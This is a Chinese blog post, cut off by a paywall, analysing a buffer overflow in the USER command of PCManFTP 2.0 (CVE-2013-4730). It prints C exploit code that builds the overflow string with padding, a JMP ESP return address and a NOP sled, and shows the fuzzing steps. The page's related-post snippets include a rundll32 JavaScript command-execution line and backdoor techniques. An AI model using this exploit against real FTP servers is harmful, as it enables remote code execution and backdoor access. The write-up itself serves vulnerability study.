通过一个远程溢出漏洞实现开后门的操作

最新推荐文章于 2022-11-18 11:36:46 发布
VIP文章 最新推荐文章于 2022-11-18 11:36:46 发布
阅读量1k 收藏
点赞数
分类专栏: 二进制 文章标签: 二进制漏洞 远程溢出漏洞 ShellCode 后门
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44045581/article/details/88740127
版权

通过一个远程溢出漏洞实现开后门的操作

PCManFTP v2.0(CVE-2013-4730)漏洞分析

软件名称:PCManFTP
软件版本:2.0
漏洞模块:PCManFTPD2.exe
模块版本:2.0.0.0
编译日期:2005-01-01 操作系统:Windows 7
漏洞编号:CVE-2013-4730
危害等级:高危
漏洞类型:缓冲区溢出
威胁类型:远程

1. 软件简介

PCMan’s FTP Server是洪任谕程序员所研发的一套FTP服务器软件。该软件具有体积小、功能简单等特点。
图片主界面

2. 漏洞成因

PCMan’s FTP Server 2.0.0版本中存在缓冲区溢出漏洞,没有正确验证用户提供的输入,远程攻击者可借助USER命令中的长字符串利用该漏洞执行任意代码。

3. 利用过程

3.1 前提
需要些一份能与FTP进行交互的代码:

WSADATA stWSA;
WSAStartup(0x0202, &stWSA);
// 2. 创建一个原始套接字
SOCKET stListen = INVALID_SOCKET;;
stListen = WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0);
// 3. 在任意地址(INADDR_ANY)上绑定一个端口21
SOCKADDR_IN stService;
stService.sin_addr.s_addr = inet_addr("127.0.0.1");
stService.sin_port = htons(21);
stService.sin_family = AF_INET;
connect(stListen, (SOCKADDR *)& stService, sizeof(stService));

// 4. 构造Exploit
char cExpolit[5000] = { 0x00 };           // Exploit容器
char cFill[5000] = { 0x00 };           // 填充字节
char cNOP[51] = { 0x00 };           // 滑板指令区
char cRetnAddr[5] = "\xE5\x28\xF4\x75"; // JMP ESP:0x75DFE555
memset(cFill, 'A', 2006); // 由Mona得到的偏移
memset(cNOP, '\x90', 50); // 少填充1字节,如果变量cNOP后面不为0x00,也会被当成字符链接进来
sprintf_s(cExpolit, "%s%s%s%s%s%s", "USER ", cFill, cRetnAddr, cNOP, bShellcode2, "\r\n");

// 5. 向FTP发送Exploit
char szRecv[0x100] = { 0 };
char *pCommand = "USER 

// 5.1 接受欢迎语
recv(stListen, szRecv, sizeof(szRecv), 0);
// 5.2 发送登陆请求
send(stListen, cExpolit, strlen(cExpolit), 0);
recv(stListen, szRecv, sizeof(szRecv), 0);
// 6. 关闭相关句柄并释放相关资源
closesocket(stListen);
WSACleanup();

3.2 Fuzz
运行Windbg,使用Mona插件生成一段3000字节长度的测试字符串,用于确定溢出点。
在这里插入图片描述
运行程序,触发溢出后,可用命令得到溢出点的偏移位置
在这里插入图片描述
在这里插入图片描述
接下来可以借助Mona在目标程序空间找到一个跳板指令“JMP ESP”,命令:!py mona jmp –resp –m “kernel32.dll”,由于我的Mona这个命令不好使,所以用X86dbg随便找了一个跳板指令。
在这里插入图片描述
3.3 ShellCode编写

最低0.47元/天 解锁文章
Todd_Q
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全简答题.doc
06-09
(3分) 缓冲区溢出攻击最常见的方法就是通过使某个特殊程序的缓冲区溢出转而执行一个S hell,通过Shell的权限可以执行高级的命令。如果这个特殊程序具有System权限,攻击成 功者就能获得一个具有Shell权限的Shell,就...
百晓生教你露一手系列----怎样利用WINDOW漏洞设置后门
weixin_34366546的博客
08-29 206
原理: 使用粘滞键功能(连按5下shift),调出cmd命令符,修改登陆密码。1.1)在系统文件夹(windows)下找到system32文件夹鼠标右键盘点选该文件夹,选择最下面的属性点击进入如下图所示。2)选择安全,高级,点击确定如下图所示。3)将所有者改为Administrators,点击下方的替换子容器和对象的所有者,点击确定,如下图所示。4)再次进入system32文件夹属性选项,选择安全...
PHP/8.1.0-dev 后门命令执行漏洞复现
m0_63253040的博客
09-25 1597
题目描述:题目利用了PHP某一开发版本的重大后门,可以利用某写东西进行代码执行。一开始这里我有个空格在:后面,所以执行不成功,去掉空格就成功了。没有发现什么点,目录扫描也没有结果,打开bp抓包。搜索PHP/8.1.0-dev。
6-18漏洞利用-后门连接
山兔的博客
07-25 764
我们一定要检测,当前系统,开放了那些端口,在某些情况下,尽量没有使用的端口,尽量关闭,我们只开启,我们服务器运行状态下,必须要开启的端口号,不相关的端口号,直接关闭,当然,我们也要实时监测系统服务器的网络状态,在出现连接过程中,我们一定要注意很有可能,这就是一次连接后门程序的一个活动,我们要对它进行实时监控。我们根据bindshell,猜测到,会是一个后门程序,这个时候,我们就需要验证这个猜测,我们用nc连接目标地址的端口号,来对其后门进行连接,从而获取对应的权限。我们服务器为什么存在后门程序。...
④开启shift后门实验报告
m0_47110032的博客
11-18 929
开启shift后门 实验报告
命令执行漏洞原理与利用
金色%夕阳的博客
04-30 995
命令执行漏洞原理与利用 1 命令执行漏洞概述 程序员使用脚本语言(比如PHP)开发应用程序过程中,脚本语言开发十分快速、简洁,方便,但是也伴随着一些问题。比如说速度慢,或者无法接触系统底层,如果我们开发的应用,特别是企业级的一些应用需要去调用一些外部程序。当应用需要调用一些外部程序时就会用到一些执行系统命令的函数。 而应用在调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,在没有过滤用户的输入的情况下,就会造成命令执行漏洞远程命令执行漏洞(RCE)是指可以在仅有远程访问权
网络安全知识竞赛小测试--网络攻击技术.pdf
06-09
截获网络流量 10、许多黑客攻击都是利用软件实现中的缓冲区溢出漏洞,对于这一威胁,最可靠的解决方 案是( )[单选题] * A.安装防火墙 B.给系统安装最新的补丁(正确答案) C.安装入侵检测系统 D.安装防病毒软件 11...
X-Scan v3.1
10-22
采用多线程方式对指定IP地址段(或单机)进行安全漏洞检测,支持插件功能,提供了图形界面和命令行两种操作方式,扫描内容包括:远程服务类型、操作系统类型及版本,各种弱口令漏洞后门、应用服务漏洞、网络设备...
网络安全论文.doc
最新发布
06-10
7 3.6 DDoS攻击下的防御 7 4 缓冲区溢出攻击与防御 8 4.1 缓冲区溢出攻击简介 8 4.2缓冲区溢出攻击 9 4.3缓冲区溢出的防御 10 5 一个基于Netbios的攻击实例 11 5.1 攻击步骤 11 5.2 如何防范IPC$漏洞 13 6 常用攻击...
网络安全论文(1).doc
06-10
7 3.6 DDoS攻击下的防御 7 4 缓冲区溢出攻击与防御 8 4.1 缓冲区溢出攻击简介 8 4.2缓冲区溢出攻击 9 4.3缓冲区溢出的防御 10 5 一个基于Netbios的攻击实例 11 5.1 攻击步骤 11 5.2 如何防范IPC$漏洞 13 6 常用攻击...
易语言源码下载程序最新通杀漏洞入侵工具.rar
03-30
易语言源码下载程序最新通杀漏洞入侵工具.rar 易语言源码下载程序最新通杀漏洞入侵工具.rar 易语言源码下载程序最新通杀漏洞入侵工具.rar 易语言源码下载程序最新通杀漏洞入侵工具.rar 易语言源码下载程序最新通杀漏洞入侵工具.rar 易语言源码下载程序最新通杀漏洞入侵工具.rar
远程溢出学习程序示例
03-18
学习远程溢出很好的示例,编写安全程序要学习的内容
远程溢出工具
06-08
远程溢出工具非常好用的!应该会与很多人用到的。360会查。使用请关了360
C32反汇编工具去后门
03-15
人也很好听二哥个二哥二个如果同样会突然认同和
CCProxy远程溢出漏洞分析
03-04
CCProxy是一个国产的支持HTTP、FTP、Gopher、SOCKS4/5、Telnet、Secure(HTTPS)、News(NNTP)、 RTSP、MMS等代理协议的代理服务器软件。因为其简单易用、界面友好,非常适合在对流量要求不高的网络环境中使用,所以在国内有很多初级的网管喜欢用这个软件。笔者在测试发现CCProxy 6.0版本存在多处缓冲区溢出漏洞,可以导致攻击者远程执行任意代码。
PHP 8.1.0-dev 后门远程命令执行漏洞(vulhub)
X_IT666的博客
07-28 1191
漏洞介绍 关于漏洞:PHP 8.1.0-dev 后门远程命令执行漏洞 PHP verion 8.1.0-dev的PHP在服务器上运行,则攻击者可以通过发送User-Agentt标头执行任意代码。 影响版本:PHP 8.1.0-dev 配置环境: 靶机:centos8 攻击机:kali 其他:vulhub -->php–>8.1-backdoor 漏洞攻击思路: 扫描端口,确定开启的服务,漏洞寻找,漏洞利用 信息收集 nmap扫描端口 访问http://192.168
高级语言编写shellcode
weixin_33729196的博客
06-06 558
首先修改配置然后改函数生成顺序(这里要先生成一遍才能看到)先生成映射文件再用一个记事本修改顺序再生成一遍重新生成运行成功获取shellcode先找到布局一直到main函数测试(关掉dep) #include"stdafx.h" #include <winsock2.h> #include <windows.h> // C/C++ // |-常规 // | |-调...
Shell脚本学习-阶段二十六-Web服务与端口
qq_43058317的博客
06-11 3448
文章目录-Shell阶段二十六-端口与服务对照表前言端口与服务对照表简介分类端口性质划分服务方式划分端口0-300端口300-1000端口1000-3000端口3000-8000端口8000-20000总结 前言 端口与服务对照表 2端口:管理实用程序 3端口:压缩进程 5端口:远程作业登录 7端口:回显 9端口:丢弃 11端口:在线用户 13端口:时间 17端口:每日引用 18端口:消息发送协议 19端口:字符发生器 20端口:FTP文件传输协议(默认数据口) 21端口:FTP文件传输协议(控..
利用Javascript做后门的利用方式
KHOST的博客
03-16 1971
//Execute A Command rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("calc"); //Write To A File rundll32.exe javascript:"\..\m...
设计一个缓冲区溢出漏洞分析工具,能发现给定程序是否存在缓冲区溢出漏 洞
04-23
ChitGPT不能为您提供具体的代码实现,但我可以为您提供一些思路。缓冲区溢出漏洞的检测可以采用以下方法: 1. 静态分析:可以采用静态...同时,缓冲区溢出漏洞的检测是一个复杂而持续的过程,需要不断地更新和优化。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值